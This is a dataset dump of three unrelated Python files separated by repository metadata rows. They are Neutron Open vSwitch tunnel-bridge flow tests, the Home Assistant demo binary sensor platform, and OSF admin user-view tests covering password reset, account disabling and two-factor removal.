ofpp.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, [
ofpp.OFPActionPopVlan(),
ofpp.OFPActionSetField(tunnel_id=tun_id),
] + [ofpp.OFPActionOutput(p, 0) for p in ports]),
],
match=ofpp.OFPMatch(vlan_vid=vlan | ofp.OFPVID_PRESENT),
priority=1,
table_id=22)),
]
self.assertEqual(expected, self.mock.mock_calls)
def test_delete_flood_to_tun(self):
vlan = 3333
self.br.delete_flood_to_tun(vlan=vlan)
(dp, ofp, ofpp) = self._get_dp()
expected = [
call.delete_flows(table_id=22,
match=ofpp.OFPMatch(vlan_vid=vlan | ofp.OFPVID_PRESENT)),
]
self.assertEqual(expected, self.mock.mock_calls)
def test_install_unicast_to_tun(self):
vlan = 3333
port = 55
mac = '08:60:6e:7f:74:e7'
tun_id = 2222
self.br.install_unicast_to_tun(vlan=vlan,
tun_id=tun_id,
port=port,
mac=mac)
(dp, ofp, ofpp) = self._get_dp()
expected = [
call._send_msg(ofpp.OFPFlowMod(dp,
cookie=0,
instructions=[
ofpp.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, [
ofpp.OFPActionPopVlan(),
ofpp.OFPActionSetField(tunnel_id=tun_id),
ofpp.OFPActionOutput(port, 0),
]),
],
match=ofpp.OFPMatch(
eth_dst=mac, vlan_vid=vlan | ofp.OFPVID_PRESENT),
priority=2,
table_id=20)),
]
self.assertEqual(expected, self.mock.mock_calls)
def test_delete_unicast_to_tun(self):
vlan = 3333
mac = '08:60:6e:7f:74:e7'
self.br.delete_unicast_to_tun(vlan=vlan, mac=mac)
(dp, ofp, ofpp) = self._get_dp()
expected = [
call.delete_flows(table_id=20,
match=ofpp.OFPMatch(
eth_dst=mac, vlan_vid=vlan | ofp.OFPVID_PRESENT)),
]
self.assertEqual(expected, self.mock.mock_calls)
def test_delete_unicast_to_tun_without_mac(self):
vlan = 3333
mac = None
self.br.delete_unicast_to_tun(vlan=vlan, mac=mac)
(dp, ofp, ofpp) = self._get_dp()
expected = [
call.delete_flows(table_id=20,
match=ofpp.OFPMatch(vlan_vid=vlan | ofp.OFPVID_PRESENT)),
]
self.assertEqual(expected, self.mock.mock_calls)
def test_install_arp_responder(self):
vlan = 3333
ip = '192.0.2.1'
mac = '08:60:6e:7f:74:e7'
self.br.install_arp_responder(vlan=vlan, ip=ip, mac=mac)
(dp, ofp, ofpp) = self._get_dp()
expected = [
call._send_msg(ofpp.OFPFlowMod(dp,
cookie=0,
instructions=[
ofpp.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, [
ofpp.OFPActionSetField(arp_op=self.arp.ARP_REPLY),
ofpp.NXActionRegMove(
dst_field='arp_tha',
n_bits=48,
src_field='arp_sha'),
ofpp.NXActionRegMove(
dst_field='arp_tpa',
n_bits=32,
src_field='arp_spa'),
ofpp.OFPActionSetField(arp_sha=mac),
ofpp.OFPActionSetField(arp_spa=ip),
ofpp.OFPActionOutput(ofp.OFPP_IN_PORT, 0),
]),
],
match=ofpp.OFPMatch(
eth_type=self.ether_types.ETH_TYPE_ARP,
arp_tpa=ip,
vlan_vid=vlan | ofp.OFPVID_PRESENT),
priority=1,
table_id=21)),
]
self.assertEqual(expected, self.mock.mock_calls)
def test_delete_arp_responder(self):
vlan = 3333
ip = '192.0.2.1'
self.br.delete_arp_responder(vlan=vlan, ip=ip)
(dp, ofp, ofpp) = self._get_dp()
expected = [
call.delete_flows(
match=ofpp.OFPMatch(
eth_type=self.ether_types.ETH_TYPE_ARP,
arp_tpa=ip,
vlan_vid=vlan | ofp.OFPVID_PRESENT),
table_id=21),
]
self.assertEqual(expected, self.mock.mock_calls)
def test_delete_arp_responder_without_ip(self):
vlan = 3333
ip = None
self.br.delete_arp_responder(vlan=vlan, ip=ip)
(dp, ofp, ofpp) = self._get_dp()
expected = [
call.delete_flows(
match=ofpp.OFPMatch(
eth_type=self.ether_types.ETH_TYPE_ARP,
vlan_vid=vlan | ofp.OFPVID_PRESENT),
table_id=21),
]
self.assertEqual(expected, self.mock.mock_calls)
def test_setup_tunnel_port(self):
network_type = 'vxlan'
port = 11111
self.br.setup_tunnel_port(network_type=network_type, port=port)
(dp, ofp, ofpp) = self._get_dp()
expected = [
call._send_msg(ofpp.OFPFlowMod(dp,
cookie=0,
instructions=[
ofpp.OFPInstructionGotoTable(table_id=4),
],
match=ofpp.OFPMatch(in_port=port),
priority=1,
table_id=0)),
]
self.assertEqual(expected, self.mock.mock_calls)
def test_cleanup_tunnel_port(self):
port = 11111
self.br.cleanup_tunnel_port(port=port)
(dp, ofp, ofpp) = self._get_dp()
expected = [
call.delete_flows(in_port=port),
]
self.assertEqual(expected, self.mock.mock_calls)
def test_add_dvr_mac_tun(self):
mac = '00:02:b3:13:fe:3d'
port = 8888
self.br.add_dvr_mac_tun(mac=mac, port=port)
(dp, ofp, ofpp) = self._get_dp()
expected = [
call._send_msg(ofpp.OFPFlowMod(dp,
cookie=0,
instructions=[
ofpp.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, [
ofpp.OFPActionOutput(port, 0),
]),
],
match=ofpp.OFPMatch(eth_src=mac),
priority=1,
table_id=9)),
]
self.assertEqual(expected, self.mock.mock_calls)
def test_remove_dvr_mac_tun(self):
mac = '00:02:b3:13:fe:3d'
self.br.remove_dvr_mac_tun(mac=mac)
(dp, ofp, ofpp) = self._get_dp()
expected = [
call.delete_flows(eth_src=mac, table_id=9),
]
self.assertEqual(expected, self.mock.mock_calls)
| apache-2.0 | -28,277,967,848,881,816 | 38.652893 | 79 | 0.458524 | false |
keerts/home-assistant | homeassistant/components/binary_sensor/demo.py | 10 | 1257 | """
Demo platform that has two fake binary sensors.
For more details about this platform, please refer to the documentation
https://home-assistant.io/components/demo/
"""
from homeassistant.components.binary_sensor import BinarySensorDevice
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Setup the Demo binary sensor platform."""
add_devices([
DemoBinarySensor('Basement Floor Wet', False, 'moisture'),
DemoBinarySensor('Movement Backyard', True, 'motion'),
])
class DemoBinarySensor(BinarySensorDevice):
"""A Demo binary sensor."""
def __init__(self, name, state, device_class):
"""Initialize the demo sensor."""
self._name = name
self._state = state
self._sensor_type = device_class
@property
def device_class(self):
"""Return the class of this sensor."""
return self._sensor_type
@property
def should_poll(self):
"""No polling needed for a demo binary sensor."""
return False
@property
def name(self):
"""Return the name of the binary sensor."""
return self._name
@property
def is_on(self):
"""Return true if the binary sensor is on."""
return self._state
| apache-2.0 | -4,975,289,294,281,543,000 | 26.933333 | 71 | 0.644391 | false |
kch8qx/osf.io | admin_tests/users/test_views.py | 6 | 4123 | from django.test import RequestFactory
from nose import tools as nt
import mock
from tests.base import AdminTestCase
from website import settings
from framework.auth import User
from tests.factories import UserFactory, AuthUserFactory
from admin_tests.utilities import setup_view, setup_log_view
from admin.users.views import (
UserView,
ResetPasswordView,
User2FactorDeleteView,
UserDeleteView,
)
from admin.common_auth.logs import OSFLogEntry
class TestUserView(AdminTestCase):
def test_no_guid(self):
request = RequestFactory().get('/fake_path')
view = UserView()
view = setup_view(view, request)
with nt.assert_raises(AttributeError):
view.get_object()
def test_load_data(self):
user = UserFactory()
guid = user._id
request = RequestFactory().get('/fake_path')
view = UserView()
view = setup_view(view, request, guid=guid)
res = view.get_object()
nt.assert_is_instance(res, dict)
def test_name_data(self):
user = UserFactory()
guid = user._id
request = RequestFactory().get('/fake_path')
view = UserView()
view = setup_view(view, request, guid=guid)
temp_object = view.get_object()
view.object = temp_object
res = view.get_context_data()
nt.assert_equal(res[UserView.context_object_name], temp_object)
class TestResetPasswordView(AdminTestCase):
def test_reset_password_context(self):
user = UserFactory()
guid = user._id
request = RequestFactory().get('/fake_path')
view = ResetPasswordView()
view = setup_view(view, request, guid=guid)
res = view.get_context_data()
nt.assert_is_instance(res, dict)
nt.assert_in((user.emails[0], user.emails[0]), view.initial['emails'])
class TestDisableUser(AdminTestCase):
def setUp(self):
self.user = UserFactory()
self.request = RequestFactory().post('/fake_path')
self.view = UserDeleteView()
self.view = setup_log_view(self.view, self.request, guid=self.user._id)
def test_get_object(self):
obj = self.view.get_object()
nt.assert_is_instance(obj, User)
def test_get_context(self):
res = self.view.get_context_data(object=self.user)
nt.assert_in('guid', res)
nt.assert_equal(res.get('guid'), self.user._id)
def test_disable_user(self):
settings.ENABLE_EMAIL_SUBSCRIPTIONS = False
count = OSFLogEntry.objects.count()
self.view.delete(self.request)
self.user.reload()
nt.assert_true(self.user.is_disabled)
nt.assert_equal(OSFLogEntry.objects.count(), count + 1)
def test_reactivate_user(self):
settings.ENABLE_EMAIL_SUBSCRIPTIONS = False
self.view.delete(self.request)
count = OSFLogEntry.objects.count()
self.view.delete(self.request)
self.user.reload()
nt.assert_false(self.user.is_disabled)
nt.assert_equal(OSFLogEntry.objects.count(), count + 1)
class TestRemove2Factor(AdminTestCase):
def setUp(self):
super(TestRemove2Factor, self).setUp()
self.user = AuthUserFactory()
self.request = RequestFactory().post('/fake_path')
self.view = User2FactorDeleteView()
self.view = setup_log_view(self.view, self.request, guid=self.user._id)
@mock.patch('admin.users.views.User.delete_addon')
def test_remove_two_factor_get(self, mock_delete_addon):
self.view.delete(self.request)
mock_delete_addon.assert_called_with('twofactor')
def test_integration_delete_two_factor(self):
user_addon = self.user.get_or_add_addon('twofactor')
nt.assert_not_equal(user_addon, None)
user_settings = self.user.get_addon('twofactor')
nt.assert_not_equal(user_settings, None)
count = OSFLogEntry.objects.count()
self.view.delete(self.request)
post_addon = self.user.get_addon('twofactor')
nt.assert_equal(post_addon, None)
nt.assert_equal(OSFLogEntry.objects.count(), count + 1)
| apache-2.0 | 7,104,416,714,735,291,000 | 33.940678 | 79 | 0.650012 | false |
Subsets and Splits